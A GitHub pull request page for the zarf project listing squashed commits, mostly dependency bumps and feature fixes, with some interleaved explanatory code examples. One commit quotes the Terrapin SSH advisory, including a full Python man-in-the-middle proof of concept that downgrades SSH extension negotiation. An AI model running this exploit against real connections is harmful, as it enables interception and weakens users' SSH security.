
Rebase #2215

Closed
wants to merge 24 commits into from

jbrewer3 (Contributor) commented Jan 6, 2024

Description

...

Related Issue

Fixes #

Relates to #

Type of change

  • Bug fix (non-breaking change which fixes an issue)
  • New feature (non-breaking change which adds functionality)
  • Other (security config, docs update, etc)

Checklist before merging

renovate bot and others added 24 commits December 14, 2023 12:55
[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [pepr](https://togithub.com/defenseunicorns/pepr) | [`^0.19.0` -> `^20.0.0`](https://renovatebot.com/diffs/npm/pepr/0.19.0/20.0.0) | [![age](https://developer.mend.io/api/mc/badges/age/npm/pepr/20.0.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/pepr/20.0.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/pepr/0.19.0/20.0.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/pepr/0.19.0/20.0.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency
Dashboard for more information.

---

### Release Notes

<details>
<summary>defenseunicorns/pepr (pepr)</summary>

### [`v20.0.0`](https://togithub.com/defenseunicorns/pepr/compare/v0.19.0...v20.0.0)

[Compare Source](https://togithub.com/defenseunicorns/pepr/compare/v0.19.0...f06c3c2edc9e7d0176ad6007042a71dacdb99dc0)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View
repository job log
[here](https://developer.mend.io/github/defenseunicorns/zarf).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/download-artifact](https://togithub.com/actions/download-artifact) | action | major | `v3.0.2` -> `v4.0.0` |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency
Dashboard for more information.

---

### Release Notes

<details>
<summary>actions/download-artifact (actions/download-artifact)</summary>

### [`v4.0.0`](https://togithub.com/actions/download-artifact/releases/tag/v4.0.0)

[Compare Source](https://togithub.com/actions/download-artifact/compare/v3.0.2...v4.0.0)

##### What's Changed

The releases of upload-artifact@v4 and download-artifact@v4 are major changes to the backend architecture of Artifacts. They have numerous performance and behavioral improvements.

For more information, see the [@actions/artifact](https://togithub.com/actions/toolkit/tree/main/packages/artifact) documentation.

##### New Contributors

- [@bflad](https://togithub.com/bflad) made their first contribution in [https://github.com/actions/download-artifact/pull/194](https://togithub.com/actions/download-artifact/pull/194)

**Full Changelog**: actions/download-artifact@v3...v4.0.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View
repository job log
[here](https://developer.mend.io/github/defenseunicorns/zarf).


---------

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: Wayne Starr <[email protected]>
…ure `zarf prepare` (#2170)

## Description

Adds a `zarf dev deploy` command that will create + deploy a local
package in one shot.

## Related Issue

Fixes #2169 
Fixes #2098 

## Type of change

- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Other (security config, docs update, etc)

## Checklist before merging

- [x] Test, docs, adr added or updated as needed
- [x] [Contributor Guide
Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow)
followed

---------

Signed-off-by: razzle <[email protected]>
Co-authored-by: Wayne Starr <[email protected]>
…a remote (#2160)

## Description

This fixes a bug where if zarf (via crane) can't pull an image from a
remote repository, and a local tarball doesn't exist, it will output the
proper error from crane, versus hiding the issue as "image does not
exist"


## Related Issue

Fixes #2081 
<!-- or -->
Relates to #

## Type of change

- [x] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [ ] Other (security config, docs update, etc)

## Checklist before merging

- [x] Test, docs, adr added or updated as needed
- [x] [Contributor Guide
Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow)
followed

---------

Co-authored-by: Wayne Starr <[email protected]>
Co-authored-by: Wayne Starr <[email protected]>
## Description

Updated build args to include correct version of kubectl for helm / zarf

## Related Issue
Relates to #1607

## Type of change

- [ ] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [X] Other (security config, docs update, etc)

## Checklist before merging

- [ ] Test, docs, adr added or updated as needed
- [X] [Contributor Guide
Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow)
followed

---------

Co-authored-by: Wayne Starr <[email protected]>
…2190)

## Description

This PR fixes error channel handling for Zarf tunnels so lost pod
connections don't result in infinite spins. This should mostly resolve
2104 though not marking it "Fixes" as depending on how many pod
connection errors occur a deployment could still run out of retries.

## Related Issue

Relates to #2104 

## Type of change

- [X] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [ ] Other (security config, docs update, etc)

## Checklist before merging

- [ ] Test, docs, adr added or updated as needed
- [X] [Contributor Guide
Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow)
followed
…2198)

[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [github.com/anchore/stereoscope](https://togithub.com/anchore/stereoscope) | require | digest | `3610f4e` -> `4b999b7` |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency
Dashboard for more information.

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View
repository job log
[here](https://developer.mend.io/github/defenseunicorns/zarf).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
…prepare lint` (#2171)

## Description
Adding warnings for unpinned images, files and repos

## Related Issue

Relates to #2064 

## Type of change

- [ ] Bug fix (non-breaking change which fixes an issue)
- [X] New feature (non-breaking change which adds functionality)
- [ ] Other (security config, docs update, etc)

## Checklist before merging

- [ ] Test, docs, adr added or updated as needed

---------

Co-authored-by: Barry Waldbaum <[email protected]>
Co-authored-by: Wayne Starr <[email protected]>
Co-authored-by: Lucas Rodriguez <[email protected]>
Co-authored-by: razzle <[email protected]>
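The warnings this commit describes (unpinned images, files and repos) are the supply-chain checks a package linter should emit before anything is built. The following is an added example written for this page, not the project's own `zarf prepare lint` code: it walks a zarf.yaml-style component list and flags image references without a digest, HTTP(S)-sourced files without a sha256 `shasum`, and git repos without a `@ref` suffix. The field names (`images`, `files[].source`/`shasum`, `repos`), the rule that only remotely fetched files need a shasum, and the sample package are assumptions made here.

```python
"""Flag unpinned images, remote files and git repos in a Zarf-style package.

Added example, not the project's own `zarf prepare lint` code. It assumes the
zarf.yaml component layout (`images`, `files[].source/shasum`, `repos`) and
the pinning rules stated in the comments; the sample package is constructed.
"""
import re
from urllib.parse import urlsplit

# OCI reference: name (may contain registry:port/path), optional :tag, optional @sha256 digest.
IMAGE_RE = re.compile(
    r"^(?P<name>[^@\s]+?)(?::(?P<tag>[\w][\w.-]{0,127}))?(?:@(?P<digest>sha256:[0-9a-f]{64}))?$")
SHA256_RE = re.compile(r"^[0-9a-f]{64}$")


def repo_ref(repo):
    """Return the pinned ref of a `url@ref` repo entry, or None when unpinned.

    Only an '@' after the last '/' counts as a ref, so the user part of an
    scp-style URL (git@host:org/repo.git) is not mistaken for a pin.
    """
    at = repo.rfind("@")
    return repo[at + 1:] if at > repo.rfind("/") else None


def lint_component(component):
    """Return one warning string per unpinned artifact in a component."""
    warnings, name = [], component.get("name", "<unnamed>")
    for image in component.get("images", []):
        m = IMAGE_RE.match(image)
        if m is None:
            warnings.append(f"{name}: image {image!r} is not a valid reference")
        elif m.group("digest") is None:
            # A tag (or no tag at all) is mutable; only a digest is immutable.
            warnings.append(f"{name}: image {image!r} is not pinned to a digest")
    for f in component.get("files", []):
        src = f.get("source", "")
        # Assumption: only files fetched over HTTP(S) at build time need a shasum.
        if urlsplit(src).scheme in ("http", "https") and not SHA256_RE.match(f.get("shasum", "")):
            warnings.append(f"{name}: remote file {src!r} has no sha256 shasum")
    for repo in component.get("repos", []):
        if repo_ref(repo) is None:
            warnings.append(f"{name}: repo {repo!r} is not pinned to a tag or commit")
    return warnings


def lint_package(package):
    """Lint every component; returns {component_name: [warnings]}."""
    return {c.get("name", "<unnamed>"): lint_component(c) for c in package.get("components", [])}


# Constructed sample package (placeholder hosts, not real artifacts).
SAMPLE_PACKAGE = {
    "components": [
        {"name": "pinned",
         "images": ["registry.example/app:1.2.3@sha256:" + "a" * 64],
         "files": [{"source": "https://files.example/tool.tgz", "target": "tool.tgz", "shasum": "b" * 64}],
         "repos": ["https://git.example/org/app.git@v1.2.3"]},
        {"name": "loose",
         "images": ["nginx:1.25", "docker.io/library/alpine", "bad image"],
         "files": [{"source": "https://files.example/script.sh", "target": "script.sh"},
                   {"source": "local/config.yaml", "target": "config.yaml"}],
         "repos": ["https://git.example/org/app.git", "git@git.example:org/app.git"]},
    ]
}

if __name__ == "__main__":
    for component, warnings in lint_package(SAMPLE_PACKAGE).items():
        print(f"{component}: {len(warnings)} warning(s)")
        for w in warnings:
            print("  WARN", w)
```

A tag such as `nginx:1.25` is reported as unpinned on purpose: tags can be moved by the registry owner, and only the digest fixes the exact bytes that will be bundled into the package.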
## Description

This adds wildcard and `default` exclusion support to the `--components`
field

## Related Issue

Fixes #1794
Fixes #2051 
Fixes #2035

## Type of change

- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Other (security config, docs update, etc)

## Checklist before merging

- [ ] Test, docs, adr added or updated as needed
- [x] [Contributor Guide
Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow)
followed
## Description

Changes OCI refs from `:<version>-<arch>` to `:<version>` and instead
moves that logic more correctly into the `-a/--architecture` flag.

This PR also adds `flavor` to the pkg's build metadata so it can be
appended to the ref: `:<version>-<flavor>` if it exists. This is because
flavor is a higher level specifier than arch.

- Flavors `vanilla` and `chocolate` can have `amd64/arm64/etc...` arch
variants
- No flavor (just `<version>`) can have `amd64/arm64/etc...` arch
variants
- Zarf makes OS determinations at runtime, so all OS variants of a
package are built and included, regardless of `flavor` or `arch`,
therefore for the platform portion of the image index created: `multi`
is used to denote that the package is not directly tied to any specific
OS.

Example index:

```json
{
  "schemaVersion": 2,
  "manifests": [
    {
      "mediaType": "application/vnd.oci.image.manifest.v1+json",
      "digest": "sha256:42105043580ce0a6f5cb519a57917056597449ffc42b5be12d49f7856f3747ab",
      "size": 2827,
      "platform": {
        "architecture": "arm64",
        "os": "multi"
      }
    },
    {
      "mediaType": "application/vnd.oci.image.manifest.v1+json",
      "digest": "sha256:556ced6297ff9627b99e07d0e125df1f199be4c20d9caf6024b5c53303becc15",
      "size": 2827,
      "platform": {
        "architecture": "amd64",
        "os": "multi"
      }
    }
  ]
}
```

## Type of change

- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Other (security config, docs update, etc)

## Checklist before merging

- [x] Test, docs, adr added or updated as needed
- [x] [Contributor Guide
Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow)
followed

---------

Signed-off-by: razzle <[email protected]>
Co-authored-by: Wayne Starr <[email protected]>
Co-authored-by: Austin Abro <[email protected]>
…2201)

[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| golang.org/x/crypto | require | minor | `v0.16.0` -> `v0.17.0` |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency
Dashboard for more information.

### GitHub Vulnerability Alerts

#### [CVE-2023-48795](https://togithub.com/warp-tech/russh/security/advisories/GHSA-45x7-px36-x8w8)

### Summary

Russh v0.40.1 and earlier is vulnerable to a novel prefix truncation
attack (a.k.a. Terrapin attack), which allows a man-in-the-middle
attacker to strip an arbitrary number of messages right after the
initial key exchange, breaking SSH extension negotiation (RFC8308) in
the process and thus downgrading connection security.

### Mitigations

To mitigate this protocol vulnerability, OpenSSH suggested a so-called
"strict kex" which alters the SSH handshake to ensure a
Man-in-the-Middle attacker cannot introduce unauthenticated messages as
well as convey sequence number manipulation across handshakes. Support
for strict key exchange has been added to Russh in the patched version.

**Warning: To take effect, both the client and server must support this
countermeasure.**

As a stop-gap measure, peers may also (temporarily) disable the affected
algorithms and use unaffected alternatives like AES-GCM instead until
patches are available.

### Details

The SSH specifications of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com MACs) are vulnerable against an arbitrary prefix
truncation attack (a.k.a. Terrapin attack). This allows for an extension
negotiation downgrade by stripping the SSH_MSG_EXT_INFO sent after the
first message after SSH_MSG_NEWKEYS, downgrading security, and disabling
attack countermeasures in some versions of OpenSSH. When targeting
Encrypt-then-MAC, this attack requires the use of a CBC cipher to be
practically exploitable due to the internal workings of the cipher mode.
Additionally, this novel attack technique can be used to exploit
previously unexploitable implementation flaws in a Man-in-the-Middle
scenario.

The attack works by an attacker injecting an arbitrary number of
SSH_MSG_IGNORE messages during the initial key exchange and consequently
removing the same number of messages just after the initial key exchange
has concluded. This is possible due to missing authentication of the
excess SSH_MSG_IGNORE messages and the fact that the implicit sequence
numbers used within the SSH protocol are only checked after the initial
key exchange.

In the case of ChaCha20-Poly1305, the attack is guaranteed to work on
every connection as this cipher does not maintain an internal state
other than the message's sequence number. In the case of
Encrypt-Then-MAC, practical exploitation requires the use of a CBC
cipher; while theoretical integrity is broken for all ciphers when using
this mode, message processing will fail at the application layer for CTR
and stream ciphers.

For more details and a pre-print of the associated research paper, see
[https://terrapin-attack.com](https://terrapin-attack.com). This website
is not affiliated with Russh in any way.

### PoC

<details>
<summary>Extension Negotiation Downgrade Attack (chacha20-poly1305@openssh.com)</summary>

```python
#!/usr/bin/python3
import socket
from binascii import unhexlify
from threading import Thread
from time import sleep


#####################################################################################
## Proof of Concept for the extension downgrade attack                             ##
##                                                                                 ##
## Variant: ChaCha20-Poly1305                                                      ##
##                                                                                 ##
## Client(s) tested: OpenSSH 9.5p1 / PuTTY 0.79                                    ##
## Server(s) tested: OpenSSH 9.5p1                                                 ##
##                                                                                 ##
## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0    ##
#####################################################################################

# IP and port for the TCP proxy to bind to
PROXY_IP = '127.0.0.1'
PROXY_PORT = 2222

# IP and port of the server
SERVER_IP = '127.0.0.1'
SERVER_PORT = 22

LENGTH_FIELD_LENGTH = 4

def pipe_socket_stream(in_socket, out_socket):
    try:
        while True:
            data = in_socket.recv(4096)
            if len(data) == 0:
                break
            out_socket.send(data)
    except ConnectionResetError:
        print("[!] Socket connection has been reset. Closing sockets.")
    except OSError:
        print("[!] Sockets closed by another thread. Terminating pipe_socket_stream thread.")
    in_socket.close()
    out_socket.close()

rogue_msg_ignore = unhexlify('0000000C060200000000000000000000')
def perform_attack(client_socket, server_socket):
    # Version exchange
    client_vex = client_socket.recv(255)
    server_vex = server_socket.recv(255)
    client_socket.send(server_vex)
    server_socket.send(client_vex)
    # SSH_MSG_KEXINIT
    client_kexinit = client_socket.recv(35000)
    server_kexinit = server_socket.recv(35000)
    client_socket.send(server_kexinit)
    server_socket.send(client_kexinit)
    # Client will now send the key exchange INIT
    client_kex_init = client_socket.recv(35000)
    server_socket.send(client_kex_init)
    # Insert ignore message (to client)
    client_socket.send(rogue_msg_ignore)
    # Wait half a second here to avoid missing EXT_INFO
    # Can be solved by counting bytes as well
    sleep(0.5)
    # KEX_REPLY / NEW_KEYS / EXT_INFO
    server_response = server_socket.recv(35000)
    # Strip EXT_INFO before forwarding server_response to client
    # Length fields of KEX_REPLY and NEW_KEYS are still unencrypted
    server_kex_reply_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[:LENGTH_FIELD_LENGTH])
    server_newkeys_start = server_kex_reply_length
    server_newkeys_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[server_newkeys_start:server_newkeys_start + LENGTH_FIELD_LENGTH])
    server_extinfo_start = server_newkeys_start + server_newkeys_length
    client_socket.send(server_response[:server_extinfo_start])

if __name__ == '__main__':
    print("--- Proof of Concept for extension downgrade attack (ChaCha20-Poly1305) ---")
    mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    mitm_socket.bind((PROXY_IP, PROXY_PORT))
    mitm_socket.listen(5)

    print(f"[+] MitM Proxy started. Listening on {(PROXY_IP, PROXY_PORT)} for incoming connections...")
    try:
        while True:
            client_socket, client_addr = mitm_socket.accept()
            print(f"[+] Accepted connection from: {client_addr}")
            print(f"[+] Establishing new target connection to {(SERVER_IP, SERVER_PORT)}.")
            server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            server_socket.connect((SERVER_IP, SERVER_PORT))
            print("[+] Performing extension downgrade")
            perform_attack(client_socket, server_socket)
            print("[+] Downgrade performed. Spawning new forwarding threads to handle client connection from now on.")
            forward_client_to_server_thread = Thread(target=pipe_socket_stream, args=(client_socket, server_socket), daemon=True)
            forward_client_to_server_thread.start()
            forward_server_to_client_thread = Thread(target=pipe_socket_stream, args=(server_socket, client_socket), daemon=True)
            forward_server_to_client_thread.start()
    except KeyboardInterrupt:
        client_socket.close()
        server_socket.close()
        mitm_socket.close()
```
</details>

### Impact

This attack targets the specification of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com), which are widely adopted by well-known SSH
implementations and can be considered de-facto standard. These
algorithms can be practically exploited; however, in the case of
Encrypt-Then-MAC, we additionally require the use of a CBC cipher. As a
consequence, this attack works against all well-behaving SSH
implementations supporting either of those algorithms and can be used to
downgrade (but not fully strip) connection security in case SSH
extension negotiation (RFC8308) is supported. The attack may also enable
attackers to exploit certain implementation flaws in a man-in-the-middle
(MitM) scenario.

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View
repository job log
[here](https://developer.mend.io/github/defenseunicorns/zarf).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
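The advisory's Details and Impact sections give a defender everything needed to decide whether a given client/server pair is exposed: the negotiated cipher and MAC per direction, and whether both peers advertise strict key exchange. The following is an added example written for this page (not code from the advisory, Russh or Zarf) that builds and parses SSH_MSG_KEXINIT payloads in the RFC 4253 section 7.1 layout, runs the RFC's first-client-preference negotiation, and classifies each direction by the advisory's criteria: practically exploitable with chacha20-poly1305@openssh.com or an `-etm@openssh.com` MAC over a CBC cipher, only theoretically affected with `-etm` over CTR or stream ciphers, and mitigated once both peers offer the OpenSSH strict-kex pseudo-algorithms. The pseudo-algorithm names `kex-strict-c-v00@openssh.com` / `kex-strict-s-v00@openssh.com` are OpenSSH's; every KEXINIT offer below is constructed, not captured.

```python
"""Classify a client/server SSH_MSG_KEXINIT pair for Terrapin (CVE-2023-48795) exposure.

Added example, not part of the advisory, Russh or Zarf. Wire format per RFC 4253
section 7.1; strict-kex pseudo-algorithm names are OpenSSH's. Offers are constructed.
"""
import struct

KEXINIT_MSG_ID = 20
STRICT_KEX_CLIENT = "kex-strict-c-v00@openssh.com"
STRICT_KEX_SERVER = "kex-strict-s-v00@openssh.com"
CHACHA20 = "chacha20-poly1305@openssh.com"
ETM_SUFFIX = "-etm@openssh.com"

# The ten name-lists of SSH_MSG_KEXINIT, in wire order.
NAME_LISTS = ["kex", "hostkey", "enc_c2s", "enc_s2c", "mac_c2s", "mac_s2c",
              "comp_c2s", "comp_s2c", "lang_c2s", "lang_s2c"]


def build_kexinit(lists, cookie=bytes(16)):
    """Serialise a KEXINIT payload (a fixed cookie is fine for offline samples)."""
    payload = bytes([KEXINIT_MSG_ID]) + cookie
    for key in NAME_LISTS:
        names = ",".join(lists.get(key, [])).encode("ascii")
        payload += struct.pack(">I", len(names)) + names
    return payload + b"\x00" + struct.pack(">I", 0)  # first_kex_packet_follows, reserved


def parse_kexinit(payload):
    """Parse a KEXINIT payload into name-lists, refusing truncated input."""
    if len(payload) < 17 or payload[0] != KEXINIT_MSG_ID:
        raise ValueError("not an SSH_MSG_KEXINIT payload")
    pos, lists = 17, {}
    for key in NAME_LISTS:
        if pos + 4 > len(payload):
            raise ValueError(f"truncated before {key} length")
        (n,) = struct.unpack(">I", payload[pos:pos + 4])
        raw = payload[pos + 4:pos + 4 + n]
        if len(raw) != n:
            raise ValueError(f"truncated inside {key}")
        lists[key] = raw.decode("ascii").split(",") if raw else []
        pos += 4 + n
    return lists


def negotiate(client_names, server_names):
    """RFC 4253: the first client-preferred name the server also lists wins."""
    return next((n for n in client_names if n in server_names), None)


def assess(client_kexinit, server_kexinit):
    """Per direction: 'vulnerable' (chacha20, or -etm MAC over a CBC cipher),
    'theoretical' (-etm over CTR/stream), 'ok', or 'no-common-cipher'.
    Strict kex only counts when both peers advertise it."""
    c, s = parse_kexinit(client_kexinit), parse_kexinit(server_kexinit)
    strict = STRICT_KEX_CLIENT in c["kex"] and STRICT_KEX_SERVER in s["kex"]
    report = {"strict_kex": strict, "directions": {}}
    for d in ("c2s", "s2c"):
        cipher = negotiate(c[f"enc_{d}"], s[f"enc_{d}"])
        mac = negotiate(c[f"mac_{d}"], s[f"mac_{d}"])
        etm = mac is not None and mac.endswith(ETM_SUFFIX)  # irrelevant under AEAD chacha20
        if cipher is None:
            status = "no-common-cipher"
        elif strict:
            status = "ok"
        elif cipher == CHACHA20 or (etm and "-cbc" in cipher):
            status = "vulnerable"
        elif etm:
            status = "theoretical"
        else:
            status = "ok"
        report["directions"][d] = {"cipher": cipher, "mac": mac, "status": status}
    report["vulnerable"] = any(v["status"] == "vulnerable" for v in report["directions"].values())
    return report


def offer(kex, ciphers, macs):
    """Build a symmetric offer (same cipher/MAC lists in both directions)."""
    return build_kexinit({"kex": kex, "hostkey": ["ssh-ed25519"],
                          "enc_c2s": ciphers, "enc_s2c": ciphers,
                          "mac_c2s": macs, "mac_s2c": macs,
                          "comp_c2s": ["none"], "comp_s2c": ["none"]})


# Constructed sample offers (not captured traffic).
ETM_MACS = ["hmac-sha2-256-etm@openssh.com", "hmac-sha2-256"]
PATCHED_CLIENT = offer(["curve25519-sha256", STRICT_KEX_CLIENT],
                       [CHACHA20, "aes256-gcm@openssh.com", "aes256-ctr"], ETM_MACS)
LEGACY_SERVER = offer(["curve25519-sha256"], [CHACHA20, "aes256-ctr", "aes256-cbc"], ETM_MACS)
PATCHED_SERVER = offer(["curve25519-sha256", STRICT_KEX_SERVER], [CHACHA20, "aes256-ctr"], ETM_MACS)
GCM_ONLY_SERVER = offer(["curve25519-sha256"], ["aes256-gcm@openssh.com"], ["hmac-sha2-256"])

if __name__ == "__main__":
    for label, srv in (("legacy", LEGACY_SERVER), ("patched", PATCHED_SERVER), ("gcm-only", GCM_ONLY_SERVER)):
        print(label, assess(PATCHED_CLIENT, srv))
```

The `GCM_ONLY_SERVER` case shows the stop-gap the advisory mentions: with neither chacha20-poly1305 nor an `-etm` MAC negotiable, the connection is not exposed even without strict kex, while the `PATCHED_CLIENT` against `LEGACY_SERVER` case shows why the advisory's warning matters, since a client that supports strict kex gains nothing until the server advertises it too.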
## Description

We would like to update the helm chart version of Gitea from 8.3.0 to
10.0.0. This will allow users to use the latest IB gitea image
(v1.20.5), which is currently the only IB gitea image that received the
necessary fix for working with the gitea helm chart
(https://repo1.dso.mil/dsop/opensource/go-gitea/gitea/-/issues/98).

We tested the v1.20.5 IB image with the 8.3.0 chart and the Gitea pod
fails because of a breaking change in the init-app-ini initContainer,
which passes a flag (that no longer exists) to the environment-to-ini
command. This error is resolved by using the 9.5.1 chart (or later).

This update requires several changes to the gitea values, which you can
read more about in the [gitea chart upgrading
docs](https://gitea.com/gitea/helm-chart#upgrading).

### Manual Testing
* created zarf init with chart and values updates (with upstream gitea
image and with IB gitea image)
* deployed new init pkg on local k3d cluster
* deployed DUBBD 0.11.1 on top successfully

## Related Issue

TBD...

## Type of change

- [x] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [x] Other (security config, docs update, etc)

## Checklist before merging

- [x] Test, docs, adr added or updated as needed
- [x] [Contributor Guide
Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow)
followed

---------

Co-authored-by: Wayne Starr <[email protected]>
[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [sigstore/cosign-installer](https://togithub.com/sigstore/cosign-installer) | action | major | `v2.8.1` -> `v3.3.0` |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency
Dashboard for more information.

---

### Release Notes

<details>
<summary>sigstore/cosign-installer (sigstore/cosign-installer)</summary>

###
[`v3.3.0`](https://togithub.com/sigstore/cosign-installer/releases/tag/v3.3.0)

[Compare
Source](https://togithub.com/sigstore/cosign-installer/compare/v3.2.0...v3.3.0)

#### What's Changed

- Bump actions/setup-go from 4.1.0 to 5.0.0 by
[@&#8203;dependabot](https://togithub.com/dependabot) in
[https://github.com/sigstore/cosign-installer/pull/152](https://togithub.com/sigstore/cosign-installer/pull/152)
- update action to use latest cosign v2.2.2 by
[@&#8203;cpanato](https://togithub.com/cpanato) in
[https://github.com/sigstore/cosign-installer/pull/153](https://togithub.com/sigstore/cosign-installer/pull/153)

**Full Changelog**:
sigstore/cosign-installer@v3.2.0...v3.3.0

###
[`v3.2.0`](https://togithub.com/sigstore/cosign-installer/releases/tag/v3.2.0)

[Compare
Source](https://togithub.com/sigstore/cosign-installer/compare/v3.1.2...v3.2.0)

**Note: This release comes with a fix for CVE-2023-46737 described in
this [Github Security
Advisory](https://togithub.com/sigstore/cosign/security/advisories/GHSA-vfp6-jrw2-99g9).
Please upgrade to this release ASAP**

see https://github.com/sigstore/cosign/releases/tag/v2.2.1

#### What's Changed

- Support the runner context of gitea act by
[@&#8203;josedev-union](https://togithub.com/josedev-union) in
[https://github.com/sigstore/cosign-installer/pull/147](https://togithub.com/sigstore/cosign-installer/pull/147)
- bump cosign to v2.2.1 by
[@&#8203;cpanato](https://togithub.com/cpanato) in
[https://github.com/sigstore/cosign-installer/pull/148](https://togithub.com/sigstore/cosign-installer/pull/148)
- test with latest go version by
[@&#8203;bobcallaway](https://togithub.com/bobcallaway) in
[https://github.com/sigstore/cosign-installer/pull/150](https://togithub.com/sigstore/cosign-installer/pull/150)

#### New Contributors

- [@&#8203;josedev-union](https://togithub.com/josedev-union) made their
first contribution in
[https://github.com/sigstore/cosign-installer/pull/147](https://togithub.com/sigstore/cosign-installer/pull/147)

**Full Changelog**:
sigstore/cosign-installer@v3...v3.2.0

###
[`v3.1.2`](https://togithub.com/sigstore/cosign-installer/releases/tag/v3.1.2)

[Compare
Source](https://togithub.com/sigstore/cosign-installer/compare/v3.1.1...v3.1.2)

#### What's Changed

- Fix build and push step Readme missing id by
[@&#8203;hbenali](https://togithub.com/hbenali) in
[https://github.com/sigstore/cosign-installer/pull/138](https://togithub.com/sigstore/cosign-installer/pull/138)
- bump cosign to v2.2.0 by
[@&#8203;cpanato](https://togithub.com/cpanato) in
[https://github.com/sigstore/cosign-installer/pull/142](https://togithub.com/sigstore/cosign-installer/pull/142)

#### New Contributors

- [@&#8203;hbenali](https://togithub.com/hbenali) made their first
contribution in
[https://github.com/sigstore/cosign-installer/pull/138](https://togithub.com/sigstore/cosign-installer/pull/138)

**Full Changelog**:
sigstore/cosign-installer@v3...v3.1.2

###
[`v3.1.1`](https://togithub.com/sigstore/cosign-installer/releases/tag/v3.1.1)

[Compare
Source](https://togithub.com/sigstore/cosign-installer/compare/v3.1.0...v3.1.1)

#### What's Changed

- default cosign to v2.1.1 by
[@&#8203;cpanato](https://togithub.com/cpanato) in
[https://github.com/sigstore/cosign-installer/pull/137](https://togithub.com/sigstore/cosign-installer/pull/137)

**Full Changelog**:
